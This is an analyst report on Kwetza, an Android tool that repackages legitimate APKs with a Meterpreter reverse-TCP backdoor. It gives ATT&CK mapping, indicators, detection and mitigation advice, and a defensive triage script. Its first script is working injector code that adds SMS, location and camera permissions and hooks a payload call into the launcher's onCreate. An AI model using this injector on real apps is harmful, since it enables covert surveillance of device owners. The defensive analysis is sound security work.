Full Report
This blog post describes a method for backdooring Android executables. After walking through the manual steps, I will show how to do the same with a new tool, Kwetza, that I'm releasing today. Infecting Android applications is a practical way to determine the impact and effect of the malicious activity we see in the wild, from ransomware to practical jokes. It not only gives you an entry point onto user devices, but also lets you see how devices, users and anti-virus products behave in these situations.
Analysis Summary
# Tool/Technique: Kwetza
## Overview
Kwetza is a newly released tool that automatically backdoors existing legitimate Android applications (APKs) by injecting a malicious payload. Its purpose is to turn a benign application into one that gives an attacker remote access to the victim's device (e.g., camera, location, SMS) when the infected application is run, while the application keeps working normally so the victim has no reason to suspect it.
## Technical Details
- Type: Tool
- Platform: Android
- Capabilities: Automates the process of injecting a malicious payload (like a reverse shell) into an existing Android APK, manipulating the application's structure (e.g., squeezing payload functionality into a single class) and potentially injecting additional dangerous permissions.
- First Seen: October 03, 2016 (Date of article publication)
## MITRE ATT&CK Mapping
The core activity is repackaging a legitimate application with a payload that runs when the application is launched and calls back to the attacker over a raw TCP reverse connection. Tactic IDs below are from the Enterprise matrix; techniques marked (Mobile) are from ATT&CK for Mobile, which fits an Android payload better than the Enterprise techniques.
- **TA0003 - Persistence**
  - T1577 - Compromise Application Executable (Mobile): the legitimate APK is modified so that its launch activity starts the payload on every launch.
- **TA0004 - Privilege Escalation**
  - Injecting extra permissions into the manifest fits this tactic only loosely. It is not an elevation-control bypass (T1548.002, Bypass User Account Control, is Windows-specific and does not apply): the payload gains capabilities the original application lacked, but the user still grants each dangerous permission at install or run time.
- **TA0011 - Command and Control**
  - T1095 - Non-Application Layer Protocol: `android/meterpreter/reverse_tcp` connects back over raw TCP; T1071 (Application Layer Protocol) would fit only the `reverse_http`/`reverse_https` variants of the payload.
  - T1571 - Non-Standard Port: the test listener used port 4444.
- **TA0009 - Collection**
  - T1636.004 - Protected User Data: SMS Messages (Mobile), T1430 - Location Tracking (Mobile) and T1512 - Video Capture (Mobile): the SMS, location and camera access the injected payload provides.
## Functionality
### Core Capabilities
- **Payload Injection:** Injects a payload (demonstrated using `android/meterpreter/reverse_tcp` generated via `msfvenom`) into a target APK.
- **Code Squeezing/Refactoring:** Automates the manual step of consolidating the payload's functionality into a single Java class (`AssistActivity.java`) within the target application structure.
- **Manifest Manipulation (Optional):** Can be instructed to add further dangerous permissions (e.g., SMS, location, camera) to the target's `AndroidManifest.xml`. The payload can only use what the manifest declares, and on Android 6.0+ an application that targets API level 23 or higher must still be granted each dangerous permission by the user at run time.
- **Entry Point Hooking (Automated):** Automates identifying and targeting the application's launch activity to ensure the payload executes upon application launch.
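As an added example (not Kwetza's own code and not from the original post), here are the two edits the capabilities above automate, applied to an apktool-decoded APK: locating the launch activity in `AndroidManifest.xml`, declaring the permissions the payload needs, and hooking the launch activity's `onCreate` in smali so the payload starts with the application. The sample manifest and smali are constructed, and the permission list and payload class descriptor (`Lcom/example/game/assist/AssistActivity;` with a `start(Context)` entry point) are assumptions; Kwetza's real template is not reproduced.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS
ET.register_namespace("android", ANDROID_NS)

# Constructed sample: decoded manifest of a benign game (what `apktool d` emits).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.game">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Game">
        <activity android:name=".SplashActivity"/>
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
"""

# Constructed sample: smali/com/example/game/MainActivity.smali from the same build.
SAMPLE_SMALI = """.class public Lcom/example/game/MainActivity;
.super Landroid/app/Activity;

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    const/high16 v0, 0x7f030000
    invoke-virtual {p0, v0}, Lcom/example/game/MainActivity;->setContentView(I)V
    return-void
.end method
"""

# Assumed for this example: what a meterpreter-style payload needs, and the descriptor
# of the single payload class plus its entry point (not Kwetza's real layout).
PAYLOAD_PERMISSIONS = [
    "android.permission.INTERNET",
    "android.permission.READ_SMS",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.CAMERA",
]
PAYLOAD_CLASS = "Lcom/example/game/assist/AssistActivity;"
HOOK_LINE = "    invoke-static {p0}, %s->start(Landroid/content/Context;)V" % PAYLOAD_CLASS


def find_launch_activity(manifest_xml):
    """Return the class name of the activity carrying the MAIN action and LAUNCHER category."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    for activity in root.iter("activity"):
        for intent_filter in activity.findall("intent-filter"):
            actions = {a.get(A + "name") for a in intent_filter.findall("action")}
            categories = {c.get(A + "name") for c in intent_filter.findall("category")}
            if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in categories:
                name = activity.get(A + "name")
                return pkg + name if name.startswith(".") else name  # expand relative names
    raise ValueError("no launcher activity found")


def add_permissions(manifest_xml, wanted):
    """Declare each missing <uses-permission>; ones already declared are left alone."""
    root = ET.fromstring(manifest_xml)
    present = {e.get(A + "name") for e in root.iter("uses-permission")}
    for i, perm in enumerate(p for p in wanted if p not in present):
        root.insert(i, ET.Element("uses-permission", {A + "name": perm}))
    return ET.tostring(root, encoding="unicode")


def hook_on_create(smali, hook_line):
    """Insert the payload call directly after invoke-super in onCreate(Bundle), so it runs
    with the activity as its Context (p0) every time the application is launched."""
    out, in_on_create = [], False
    for line in smali.splitlines():
        out.append(line)
        stripped = line.strip()
        if stripped.startswith(".method") and "onCreate(Landroid/os/Bundle;)V" in stripped:
            in_on_create = True
        elif in_on_create and stripped.startswith("invoke-super"):
            out.append(hook_line)
            in_on_create = False
    if hook_line not in out:
        raise ValueError("onCreate(Bundle) with invoke-super not found")
    return "\n".join(out) + "\n"


def backdoor(manifest_xml, smali):
    """Apply both edits; returns (launcher class, patched manifest, patched smali)."""
    launcher = find_launch_activity(manifest_xml)
    return launcher, add_permissions(manifest_xml, PAYLOAD_PERMISSIONS), hook_on_create(smali, HOOK_LINE)


if __name__ == "__main__":
    launcher, manifest, smali = backdoor(SAMPLE_MANIFEST, SAMPLE_SMALI)
    print("launcher:", launcher)
    print(manifest)
    print(smali)
```

The patched smali shows the `invoke-static` line sitting directly after `invoke-super`, which is exactly the spot a reviewer should look at when triaging a suspect APK. The rebuilt APK still has to be re-signed before it will install, which is why a repackaged build never carries the publisher's signing certificate.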
### Advanced Features
- **Customization:** The injected permissions are configurable, and the payload is defined by an editable template rather than copied verbatim from `msfvenom` output, which is the main difference from similar existing tools.
- **Session Persistence:** In testing, the meterpreter session stayed up while the device was locked and while the application was in the background. Surviving a reboot is not demonstrated: the payload is started from the launch activity, so after a reboot it runs again only when the user opens the application.
## Indicators of Compromise
(Note: Indicators generated here are based on the *example payload* used to demonstrate Kwetza's capability, not Kwetza itself.)
- File Hashes: N/A (Kwetza is an injector tool, not the malware artifact itself)
- File Names: Infected APKs will retain the original application's name but carry the hidden payload. Example payload used: `beard.apk`.
- Registry Keys: N/A (Native Android environment)
- Network Indicators: The injected payload connects back to the LHOST/LPORT chosen at build time. The test values (LHOST=`10.42.0.211`, LPORT=`4444`) are a private lab address and Metasploit's default listener port, not indicators of any real campaign; the reusable pattern is a fresh outbound TCP connection from an ordinary application to a non-standard port.
- Behavioral Indicators: Launching the infected application opens an outbound reverse TCP connection that stays up after the application is backgrounded or the device is locked.
## Associated Threat Actors
This tool was released by the author(s) for research purposes ("to determine the impact and effect of the malicious activities"). No specific established threat actor group is associated with its use in the context provided.
## Detection Methods
- **Signature-based detection:** The example payload (`beard.apk`) was detected by 17 of 41 AV vendors before injection, so signatures for stock msfvenom Android payloads exist. Squeezing the payload into a single class inside a legitimate application changes the class layout those signatures key on, so an infected APK should not be assumed to trip the same detections; each infected APK also has its own hash.
- **Behavioral detection:** Watch for outbound connections from an ordinary application to an unusual external IP or non-standard port (4444 in the tests) immediately at launch, and for a connection that stays open after the application is backgrounded or the screen is locked. On a managed device, compare the permission set of the installed APK against the publisher's store build; a game that declares SMS, location or camera permissions is the visible symptom of the injection.
- **YARA rules:** None are given. Rules keyed on Metasploit's stock stager class names may miss a squeezed or renamed payload; rules on the dangerous-permission set combined with a launch-activity `onCreate` that calls into a class the publisher's build does not contain are more robust, as is a plain diff of the decoded APK against the store version.
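The static checks above, as an added example rather than anything from the page or from Kwetza: given the store build and a sideloaded build of the same application, both decoded with apktool, it reports permissions the suspect build adds and any call in the launcher's `onCreate` to a class the original build never shipped. Both manifests, both smali files and the original class listing are constructed inputs; the hooked class name is an assumption.

```python
import re
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"

# Constructed samples: decoded manifests of the store build and a sideloaded build.
ORIGINAL_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.game">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Game"/>
</manifest>
"""
SUSPECT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.game">
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Game"/>
</manifest>
"""

# Constructed samples: the launcher activity's smali from each build.
ORIGINAL_SMALI = """.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    const/high16 v0, 0x7f030000
    invoke-virtual {p0, v0}, Lcom/example/game/MainActivity;->setContentView(I)V
    return-void
.end method
"""
SUSPECT_SMALI = """.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/example/game/assist/AssistActivity;->start(Landroid/content/Context;)V
    const/high16 v0, 0x7f030000
    invoke-virtual {p0, v0}, Lcom/example/game/MainActivity;->setContentView(I)V
    return-void
.end method
"""
# Constructed listing of class descriptors found under smali/ in the original build.
ORIGINAL_CLASSES = {"Lcom/example/game/MainActivity;", "Lcom/example/game/SplashActivity;"}

# Matches any invoke-* instruction and captures the target class descriptor.
INVOKE_RE = re.compile(r"^\s*invoke-[\w/]+ \{[^}]*\}, (L[^;]+;)->")


def permissions(manifest_xml):
    """Set of permission names declared by <uses-permission> elements."""
    return {e.get(A + "name") for e in ET.fromstring(manifest_xml).iter("uses-permission")}


def added_permissions(original_xml, suspect_xml):
    """Permissions the suspect build declares that the original does not."""
    return sorted(permissions(suspect_xml) - permissions(original_xml))


def on_create_call_targets(smali):
    """Classes invoked inside onCreate(Bundle), in order of appearance."""
    targets, inside = [], False
    for line in smali.splitlines():
        stripped = line.strip()
        if stripped.startswith(".method") and "onCreate(Landroid/os/Bundle;)V" in stripped:
            inside = True
        elif stripped.startswith(".end method"):
            inside = False
        elif inside:
            m = INVOKE_RE.match(line)
            if m:
                targets.append(m.group(1))
    return targets


def foreign_calls(original_smali, suspect_smali, original_classes):
    """Call targets that are new in the suspect's onCreate and are neither platform
    classes nor classes shipped in the original build: the footprint of an injected hook."""
    new = set(on_create_call_targets(suspect_smali)) - set(on_create_call_targets(original_smali))
    return sorted(c for c in new
                  if c not in original_classes and not c.startswith(("Landroid/", "Ljava/")))


def triage(original_xml, suspect_xml, original_smali, suspect_smali, original_classes):
    """Return the findings; empty lists mean nothing suspicious was seen."""
    return {
        "added_permissions": added_permissions(original_xml, suspect_xml),
        "foreign_calls": foreign_calls(original_smali, suspect_smali, original_classes),
    }


if __name__ == "__main__":
    print(triage(ORIGINAL_MANIFEST, SUSPECT_MANIFEST, ORIGINAL_SMALI, SUSPECT_SMALI, ORIGINAL_CLASSES))
```

The check is deliberately a diff against a known-good build rather than a signature for one tool: a squeezed or renamed payload still has to be reachable from the launch activity and still has to declare the permissions it uses, and neither of those survives comparison with the store APK.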
## Mitigation Strategies
- **Prevention:** Install applications only from a trusted store and keep Google Play Protect (or the device's equivalent) enabled; a repackaged APK has to be sideloaded. Scrutinize the permissions an application requests at install time and at run time, and be wary of an application that suddenly asks for new, unrelated permissions (e.g., a game asking for SMS or camera access).
- **Hardening:** Every Android application is already sandboxed, so the control that matters is what gets installed. For enterprise or internal apps, vet APKs before distribution and verify the APK signing certificate: apktool cannot reproduce the publisher's signature, so a repackaged build is signed with a different key and its certificate fingerprint will not match the publisher's. An MDM policy that blocks unknown-source installs and alerts on permission changes between versions closes the remaining gap.
## Related Tools/Techniques
- **msfvenom:** Used to generate the initial raw malicious payload (`android/meterpreter/reverse_tcp`).
- **apktool:** A required dependency; Kwetza uses it to decode the target APK to smali and resources and to rebuild it after injection.
- **Backdoor-APK:** Mentioned as a similar automation attempt.